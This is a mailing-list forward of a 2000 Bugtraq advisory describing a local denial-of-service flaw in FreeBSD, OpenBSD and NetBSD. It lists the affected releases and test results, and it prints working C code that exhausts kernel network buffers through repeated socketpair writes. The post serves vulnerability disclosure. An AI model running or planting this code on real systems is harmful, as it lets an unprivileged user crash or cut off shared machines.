tech-security: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability (fwd)

Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability (fwd)
To: None <tech-security@netbsd.org>
From: None <abs@mono.org>
List: tech-security
Date: 06/03/2000 14:56:30
  by mail.netbsd.org with SMTP; 3 Jun 2000 13:56:40 -0000
	by mono.org (8.9.3/8.9.3) id OAA00411;
	Sat, 3 Jun 2000 14:56:31 +0100 (BST)
Date: Sat, 3 Jun 2000 14:56:30 +0100 (BST)
From: <abs@mono.org>
To: tech-security@netbsd.org
Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability (fwd)
Message-ID: <Pine.NEB.4.21.0006031456050.353-100000@oblivion.mono.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

	FYI (I know most people will have seen it on bugtraq anyway)


		David/absolute
				       -- www.netbsd.org: No hype required --

---------- Forwarded message ----------
Date: Wed, 2 Aug 2000 08:41:53 -0300
From: Ussr Labs <labs@USSRBACK.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability


Release Date:
April 29, 2000

Systems Affected:
FreeBSD 3.3-RELEASE
FreeBSD 4.0-RELEASE
FreeBSD 5.0 (maybe)
Openbsd 2.5
Openbsd 2.6
Openbsd 2.7 (maybe)
NetBSD  1.4.1



THE PROBLEM

- From an original posting made about last September by Sven Berkenvs
(sven@ILSE.NL) to bugtraq:


- --- Forward ---

I stumbled across a denial of service attack on FreeBSD systems,
where
an unpriviledged user can panic the kernel. Quick and dirty testing
(code attached at the end of this mail) showed OpenBSD is vulnerable
too:

FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
test it on older FreeBSD versions.
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with
NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to
send
something over the network get stuck waiting in mbuf. Locally the
system
continues to function. Tested by a friend.

NetBSD: Not available, but it is highly probable that the affected
code
in OpenBSD is from its parent NetBSD.

- --- End of Forward ---

Upon testing this code on the new versions of *bsd the exploit still
works.

FreeBSD - 3.3-RELEASE: reboots the pc
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs
	recieves /kernel: xl0: no memory for rx list -- packet dropped!
	All network connection is dead and the route table is a mess.
FreeBSD - 5.0-Current: Untested
Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full
Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full
Openbsd - 2.7: Untested
NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase
NMBCLUS
	The network connection is dead.
NetBSD - 1.4.2: Untested

- From what I have tested on, Linux does not have any issue with
this piece of code. As for the other unices, they have not been
tested.

THE CODE

The original code written by Sven Berkenvs that causes this:

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}


Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOYgJAK3JcbWNj6DDEQJNMQCgzvEMALCmfNJ9EpPVF1uRNFiniC8AoKsV
ucQIKYXTFMT6TzTx3JNHVw0L
=LDeL
-----END PGP SIGNATURE-----